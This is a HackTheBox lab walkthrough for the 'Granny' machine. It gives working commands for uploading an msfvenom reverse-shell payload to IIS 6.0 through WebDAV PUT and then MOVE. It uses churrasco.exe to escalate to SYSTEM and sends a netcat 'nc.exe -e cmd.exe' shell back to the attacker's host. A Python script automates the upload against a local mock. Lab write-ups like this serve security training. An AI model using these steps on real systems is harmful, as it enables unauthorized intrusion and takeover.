Granny HackTheBox Walkthrough Without Metasploit

Algeus Gabir
Mar 2, 2021

1. Scan the Granny HTB Machine
— nmap -sC -sV -A -O -T4 granny.htb

Nmap scan report for granny.htb (10.129.2.63)
Host is up (0.25s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Fri, 04 Dec 2020 16:26:50 GMT
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2>
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft >
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 245.54 ms 10.10.14.1
2 245.56 ms granny.htb (10.129.2.63)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.31 seconds

2. Search for available exploits
— searchsploit iis 6.0

--------------------------------------------------------------------------------------------- ---------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure             | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                      | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                        | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                                 | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)       | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                     | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                  | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                  | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                              | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                                | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                     | windows/remote/19033.txt
--------------------------------------------------------------------------------------------- ---------------------------
Shellcodes: No Results

3. Trying 41738.py (the ScStoragePathFromUrl overflow, CVE-2017-7269) got us nowhere, so we move on.

4. The nmap http-webdav-scan output shows WebDAV is enabled with PUT, MOVE and the other write methods allowed, so probe it with davtest:
— davtest -url http://granny.htb

********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: iGT4hIsd
********************************************************
Creating directory
MKCOL SUCCEED: Created http://granny.htb/DavTestDir_iGT4hIsd
********************************************************
Sending test files
PUT shtml FAIL
PUT cfm SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.cfm
PUT asp FAIL
PUT php SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.php
PUT pl SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.pl
PUT jhtml SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jhtml
PUT txt SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
PUT html SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html
PUT aspx FAIL
PUT cgi FAIL
PUT jsp SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jsp
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
EXEC html SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html
EXEC jsp FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_iGT4hIsd
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.cfm
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.php
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.pl
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jhtml
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jsp
Executes: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
Executes: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html

5. davtest shows that PUT succeeds for most extensions but is refused for .asp and .aspx, and that only the .txt and .html uploads are served back (davtest's "EXEC SUCCEED" just means it could fetch the file again, not that code ran). nmap, however, lists MOVE among the allowed methods, and the extension filter only applies to PUT. So the plan is: upload the payload under a .txt name, then MOVE it to an .aspx name on the server.

6. Create the reverse-shell payload (LHOST is your Kali IP; LPORT must match the listener port used in step 10):
— msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP> LPORT=14143 -f aspx -o revshell.aspx

7. Rename the payload to .txt, because a direct PUT of an .aspx file is refused:
— mv revshell.aspx revshell.txt

8. Upload revshell.txt with PUT:
— curl -X PUT http://granny.htb/revshell.txt --data-binary @revshell.txt

9. Rename it back to .aspx on the server with MOVE (the Destination header takes an absolute URL):
— curl -X MOVE --header 'Destination: http://granny.htb/revshell.aspx' http://granny.htb/revshell.txt

10. Start a netcat listener to catch the reverse shell:
— nc -nlvp 14143

11. Trigger the payload by requesting the .aspx page:
— curl http://granny.htb/revshell.aspx

12. We got a shell!!!
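
The PUT-then-MOVE sequence of steps 6 to 11, automated in Python as an added example (this is not code from the original walkthrough). To run offline it talks to a small in-process mock of the IIS 6 behaviour observed above: PUT is refused for script extensions, MOVE is not checked, and OPTIONS advertises the same Public header nmap printed. The mock (MockIis6), its deny-list (BLOCKED_PUT_EXT) and the stand-in payload bytes are constructed for the demonstration; pointing the client functions at granny.htb on port 80 with the real revshell.aspx bytes sends the same three requests as the curl commands.

```python
"""Automate the IIS 6 WebDAV PUT-then-MOVE upload from the walkthrough.

The mock server below is a stand-in built for this example: it refuses
PUT for script extensions but never checks the Destination of a MOVE,
which is the mismatch the walkthrough abuses. Nothing here is fetched
from the network; against the real box, call the client functions with
host "granny.htb" and port 80 instead.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Extensions the Granny davtest run reported as "PUT ... FAIL". Used as
# the mock's deny-list only; IIS 6's real rules are not reproduced.
BLOCKED_PUT_EXT = (".asp", ".aspx", ".shtml", ".cgi")
# Methods nmap's http-methods script flags as potentially risky.
RISKY_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH",
                 "LOCK", "UNLOCK"}


class MockIis6(BaseHTTPRequestHandler):
    """Keeps uploaded files in a class-level dict; nothing is executed."""
    files = {}
    public = ("OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
              "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH")

    def log_message(self, *args):  # silence per-request logging
        pass

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Public", self.public)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_PUT(self):
        # Drain the body first so the client gets a status, not a reset.
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path.lower().endswith(BLOCKED_PUT_EXT):
            return self._reply(403)  # extension filtered on PUT ...
        self.files[self.path] = body
        self._reply(201)

    def do_MOVE(self):
        dest = urlparse(self.headers.get("Destination", "")).path
        if self.path not in self.files or not dest:
            return self._reply(404)
        self.files[dest] = self.files.pop(self.path)  # ... but not on MOVE
        self._reply(201)

    def do_GET(self):
        body = self.files.get(self.path)
        if body is None:
            return self._reply(404)
        self._reply(200, body)


def start_mock_server():
    """Serve the mock on 127.0.0.1 with an ephemeral port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockIis6)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def webdav_request(host, port, method, path, body=None, headers=None):
    """One request on a fresh connection; returns (status, body_bytes)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def risky_methods(host, port):
    """OPTIONS probe (what nmap's http-methods does): risky methods advertised."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("OPTIONS", "/")
        resp = conn.getresponse()
        advertised = {m.strip().upper()
                      for name in ("Public", "Allow")
                      for m in (resp.getheader(name) or "").split(",")
                      if m.strip()}
        resp.read()
    finally:
        conn.close()
    return RISKY_METHODS & advertised


def upload_via_move(host, port, payload, final_path, staging_ext=".txt"):
    """PUT under an allowed extension, then MOVE to the executable name.
    Returns (put_status, move_status)."""
    staging = final_path.rsplit(".", 1)[0] + staging_ext
    put_status, _ = webdav_request(host, port, "PUT", staging, body=payload)
    move_status, _ = webdav_request(
        host, port, "MOVE", staging,
        headers={"Destination": f"http://{host}:{port}{final_path}"})
    return put_status, move_status


if __name__ == "__main__":
    srv, port = start_mock_server()
    # Constructed stand-in for the msfvenom revshell.aspx bytes.
    aspx = b'<%@ Page Language="C#" %><% Response.Write("demo"); %>'
    print("risky methods:", sorted(risky_methods("127.0.0.1", port)))
    print("direct PUT .aspx:",
          webdav_request("127.0.0.1", port, "PUT", "/revshell.aspx", aspx)[0])
    print("PUT .txt then MOVE:", upload_via_move("127.0.0.1", port, aspx, "/revshell.aspx"))
    print("GET .aspx:", webdav_request("127.0.0.1", port, "GET", "/revshell.aspx")[0])
    srv.shutdown()
```

Each request uses a fresh connection because the rejecting server may close after answering; the OPTIONS probe is the same check nmap's http-methods performs, so a real engagement would run it before attempting any upload.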

13. Locate revshell.aspx on disk to find the web root, then change to that directory:
— C:\> dir \revshell.aspx /s

dir \revshell.aspx /s
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE

Directory of C:\Inetpub\wwwroot

12/05/2020 12:39 PM 2,729 revshell.aspx
1 File(s) 2,729 bytes

Total Files Listed:
1 File(s) 2,729 bytes
0 Dir(s) 18,125,639,680 bytes free

14. Start an SMB share on Kali to serve the tools (impacket's smbserver.py; the share is named bk so it matches the copy commands in step 19, and <path> is the folder holding churrasco.exe and nc.exe):
— python3 smbserver.py bk <path>

15. Look for a privilege-escalation exploit with Sherlock.ps1 (needs PowerShell, which a Windows Server 2003 host is unlikely to have), windows-exploit-suggester (only needs the output of systeminfo), or a web search.

16. The search turns up the Token Kidnapping exploit (MS09-012), compiled as churrasco.exe.

17. Download the exploit
— Site: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

18. Upload churrasco.exe (and nc.exe, for the SYSTEM reverse shell later) to the machine.

19. With the SMB share from step 14 running, pull both files over SMB from a directory the current account can write to (copy with no destination drops them into the current directory):
— copy \\<Kali IP>\bk\churrasco.exe
— copy \\<Kali IP>\bk\nc.exe

20. Confirm the exploit works by running a command through it:
— C:\> churrasco.exe whoami
— Result: nt authority\system

21. Start a second netcat listener for the SYSTEM shell:
— nc -nlvp 14144

22. Run nc.exe through churrasco so the reverse shell comes back as SYSTEM (use the full path to nc.exe if it is not in the current directory):
— C:\> churrasco.exe -d "nc.exe <Kali IP> 14144 -e cmd.exe"

23. We got a shell!!!

24. Grab the user.txt and root.txt
